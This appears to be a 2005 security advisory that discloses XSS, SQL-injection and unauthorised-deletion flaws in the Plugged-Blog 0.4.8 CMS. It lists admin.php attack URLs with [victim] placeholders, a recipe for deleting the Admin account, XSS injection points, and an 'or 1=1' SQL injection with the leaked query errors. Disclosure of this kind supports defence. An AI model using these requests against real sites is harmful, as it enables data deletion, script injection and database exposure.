############################### Plugged-Blog XSS and SQL-Injection flaw & Remove Admin vendor url: http://www.pluggedout.com advisory: http://falcondeoro.blogspot.com/2005/07/plugged-blog-xss-and-sql-injection.html vendor notify: yes exploit available: yes ############################### Plugged-Blog is a CMS WebBlog-Portal content management systen, theinstall es very easy to use and configure,it's great to use, it'sspeed.It's have a Readme and very well It's solution to all WebMasterand normal users to level down. #########versions######### 0.4.8 #########Solution######### No solution at this time ! !#########Timeline######## Discovered: 29-07-2005 vendor notify: 29-07-2005 disclosure: 30-07-2005 ####### Bad Definition ######## -Bad definition to variable userid= -Bad definition to variable contentid= -Bad definition to variable templateid= -Bad definition to variable doctupeid= -Bad definition to variable list_from= -Bad definition to variable usertypeid= -Bad definition to variable templateid= -bad definition to variable contenttypeid= http://[victim]/admin.php?action=user_del&userid=[change-valor-actually-ascendent] http://[victim]/admin.php?action=content_del&contentid=[change-valor-actually-ascendent] http://[victim]/admin.php?action=template_edit&templateid=[change-valor-actually-ascendent] http://[victim]/admin.php?action=document_add&doctypeid=[change-valor-actually-ascendent] http://[victim]/admin.php?action=user_list&list_from=[change-valor-actually-ascendent] http://[victim]/admin.php?action=usertype_edit&usertypeid=[change-valor-actually-ascendent] http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent] What do you want remove if it doesen't have nothing? :D http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent] What do you want remove if it doesn't have nothing? :p ######## How remove Admin ######## For default, the users Admin and Guest exist. And the userid to admin is 2, and the userid for the guest is 1.If you want to remove Admin, you write on browser : http://[victim]/admin.php?action=user_del&userid=2 If you want to remove Guest, you write on browser : http://[victim]/admin.php?action=user_del&userid=2 Observation: You require login for the user Admin. ##################Proof of comcepts################## In the messages we want write XSS code and we see in WebBlog Home.If you writes message XSS Code, in the url : ####### XSS message ####### http://[victim]/admin.php?action=report_statistics&report=visitors http://[victim]/admin.php?action=content_list http://[victim]/admin.php?action=report_statistics&report=page_hits Select the ID to visit (only if he see the message XSS) and we seethe XSS. ######### XSS ######### http://[victim]/admin.php?action=content_edit&contentid=[XSS-Code] http://[victim]/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code] ######### Observation ######### http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent] What do you want remove, if it doesen't have nothing? :D http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent] What do you want remove if it doesn't have nothing? :p ########### Errors SQl & Sql Injection ########### If you write XSS code in the url : http://[victim]/admin.php?action=contenttype_edit&contenttypeid=[XSS-Code] Or you change the definition to contenttypeid=[change-the-valor] you can see the message error: Problem with SQL [SELECTnContentSecurityId,cms_ContentSecurity.nUserTypeId, cms_ContentSecurity.nContentTypeId,cUserTypeName,cView,cAdd,cEdit,cDelete, cApproveFROM cms_ContentSecurity INNER JOIN cms_UserType ONcms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId WHEREnContentTypeId= ORDER BY cUserTypeName] And the table to message : Problem with SQL [SELECT * FROM cms_ContentTypeProperties WHEREnContentTypeId= ORDER BY nSortIndex] You can see the Tables and fields. If you write XSS code in the url to up, you can see the message error:Could not find record [SELECT * FROM cms_Content WHERE nContentId=;] And you have the name to the Table and the field affected. http://[victim]/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection] And you see these error:SELECT COUNT(nStatisticId) AS nCount,MAX(dView) ASdLastView,cSessionId,cIPAddress FROM cms_Statistics GROUP BYcSessionId,cIPAddress ORDER BY dLastView DESC LIMIT or 1=1,20 ######################## €nd ########################## Thxs to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/ -- Atentamente: FalconDeOro (falcondeoro.blogspot.com) Web-Blog: http://falcondeoro.blogspot.com